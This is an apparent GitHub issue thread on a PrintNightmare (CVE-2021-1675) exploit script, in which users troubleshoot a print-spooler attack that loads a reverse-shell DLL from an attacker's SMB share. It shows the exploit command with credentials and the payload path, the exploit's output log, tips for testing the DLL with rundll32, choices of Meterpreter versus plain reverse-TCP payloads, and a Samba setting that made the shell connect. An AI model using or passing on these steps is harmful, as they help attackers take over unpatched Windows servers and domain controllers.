Exploit runs but no execution/ Stuck on stage 0 #18

Open
pr0t0nus3rxyz opened this issue Jul 2, 2021 · 16 comments

@pr0t0nus3rxyz

```
$ python .\CVE-2021-1675.py ignite.local/techuser:Pass123@10.10.10.156 "\10.10.10.155\share\meter.dll"
[*] Try 1...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \10.10.10.155\share\meter.dll
[*] Stage0: 0
[*] Try 2...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \10.10.10.155\share\meter.dll
[*] Stage0: 0
[*] Try 3...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \10.10.10.155\share\meter.dll
[*] Stage0: 0
```

The DLL doesn't get executed.

@pr0t0nus3rxyz
Author

Windows Server 2016 and Windows 10 Pro

@andreluna

Check if your DLL reverse shell is running correctly:
rundll32 meter.dll, Start

@WhiteHSBG

same with you

@BlackSnufkin

#19

@pr0t0nus3rxyz
Author

> Check if your DLL reverse shell is running correctly:
> rundll32 meter.dll, Start

Yes, working fine with rundll but not with RCE.

@korang

korang commented Jul 4, 2021

I am having the same issue. Windows Server 2019, it is a DC. The DLL is uploading, but not executing. When I try to run it manually on the server it executes fine.

@WhiteHSBG

> #19

Thanks, this is very useful. I used windows/x64/meterpreter/reverse_tcp, that's a mistake.

@citronneur

See #25

@korang

korang commented Jul 4, 2021

> > #19
>
> Thanks, this is very useful. I used windows/x64/meterpreter/reverse_tcp, that's a mistake.

I have tried both meterpreter and shell with no execution.

@WhiteHSBG

> > > #19
> >
> > Thanks, this is very useful. I used windows/x64/meterpreter/reverse_tcp, that's a mistake.
>
> I have tried both meterpreter and shell with no execution.

Try the windows/x64/shell_reverse_tcp payload.

@korang

korang commented Jul 4, 2021

> See #25

How do you know what driver to use? Or what directory path to use?

@citronneur

It’s just the name of the new driver, choose one randomly!

@citronneur

Previously the exploit used « 1234 » as the name; choose one you want!

@MPereira95

Hello! I was having the same issue. I think it's related to the SMB version that you are using. In my lab I had a Windows Server 2019 and it was using SMB version 2, so I went to my Kali's /etc/samba/smb.conf and added this line to the end of [global]:
min protocol = SMB2
Then I restarted the nmbd and smbd services, ran the Python script and was able to open a reverse shell.
Cheers!

@MPereira95

Also created a low privilege user in my Windows server AD and used those credentials when executing the python script.

@zuchuanchengxuyuan

You should not use administrator users.
